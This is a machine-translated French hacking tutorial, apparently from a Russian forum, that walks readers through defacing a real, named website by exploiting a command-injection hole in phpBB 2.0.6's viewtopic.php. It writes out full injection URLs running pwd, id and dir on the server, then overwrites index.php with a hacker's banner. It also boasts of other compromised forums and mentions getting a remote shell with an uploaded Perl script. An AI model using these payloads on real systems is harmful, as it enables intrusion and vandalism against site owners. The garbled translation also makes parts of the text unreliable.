This page has been robot translated, sorry for typos if any. Original content here.

Un guide complet pour déférer (mis à jour)

Introduction
Je vois souvent la question sur le forum: "Comment casser des sites?" ou "Comment définir un site?". Aujourd'hui, vous pourrez désamorcer le portail sans faire un seul effort! J'invite tous les amoureux de proies faciles! =)

Partie principale
Aujourd'hui, je parlerai de la manière dont les défauts des différents sites sont effectués, par le biais d'erreurs dans des scripts populaires. Une grave faille de sécurité a récemment été découverte dans le moteur phpBB.
Une vulnérabilité a été découverte dans le module viewtopic.php.

Le fait est qu'un attaquant distant pourrait exécuter un script php arbitraire sur un système vulnérable en transférant environ la même ligne viewtopic.php? T = 1 & highlight =% 27

Comme vous l'avez probablement deviné, cette vulnérabilité vous permet d'exécuter des commandes arbitraires de toute longueur sur un serveur vulnérable. Aujourd'hui, nous allons utiliser ce trou et, avec vous, nous allons casser le serveur réel. Notre objectif sera précisément une déformation, c’est-à-dire le remplacement de la page principale du site par la nôtre.

Commençons donc, notre victime sera www.maxmuscle.dk (au moment de la publication de l'article, le portail résiste à la vulnérabilité).
La première chose qui nous frappe lorsque nous visitons cette page est qu’elle est construite sur la base du système de portail php-nuke.

Par défaut, le forum sur ce système est phpBB. Nous cliquons sur le lien qui nous mène au forum (http://www.maxmuscle.dk/osclux/modules.php?op=modload&name=phpbb2&file=index.php) et nous assurons qu'il s'agit bien de phpBB version 2.0.6 .

Nous donnons au forum une demande de ce type:

http://www.maxmuscle.dk/osclux/modules.php?op=modload&name=phpbb2&filе=viewtopic.php&t=2&highlight=%27.$poster=`$ls`.%27&l s =

et nous découvrons que le moteur a absorbé la ligne, ce qui est indiqué par l’inscription caractéristique à la place du surnom de l’un des utilisateurs: ") #i". Mais cela ne veut rien dire, nous pouvons facilement interrompre l'exécution des commandes sur ce serveur, mais nous ne devinerons pas et essayerons simplement de l'exécuter:

http://www.maxmuscle.dk/osclux/modules.php?op=modload&name=phpbb2&filе=viewtopic.php&t=2&highlight=%27.$poster=`$ls`.%27&l s = pwd

Cette commande (pwd) devrait nous montrer le répertoire dans lequel nous sommes maintenant, si cela se produit, alors il s'ensuit que l'exécution de commandes sur le serveur est possible. C'est ce qui se passe. Le chemin du répertoire / var / www / html / osclux / est affiché. La commande suivante suit “id” pour vérifier notre accès.

Comme nous le voyons, nos droits sont uid = 99 (personne) , c’est-à-dire les droits du serveur Web. Maintenant, nous listons les dossiers et les fichiers dans le répertoire html_public, avec la commande "dir / var / www / html / osclux" et trouvons ce dont nous avons tant besoin pour defeys index.php se trouve dans ce répertoire.

Nous sommes donc à la ligne d'arrivée - en exécutant la commande echo Piraté par vasya> index.php , nous afficherons le titre «Piraté par vasya» sur la page principale. Nous vérifions. Il s'est avéré.

Vous avez fait une déformation.

Au lieu de conclusion
C’est le moyen le plus simple de réparer hackzona.ru, c’est ainsi que le forum sur nsd.ru a été rompu. Je remarque également qu’il s’agit de la mise en oeuvre la plus simple de ce trou: dans de bonnes conditions, vous pouvez facilement télécharger un script Perl sur le serveur en écoutant un port spécifique et obtenir un shell à part entière sans aucun droit.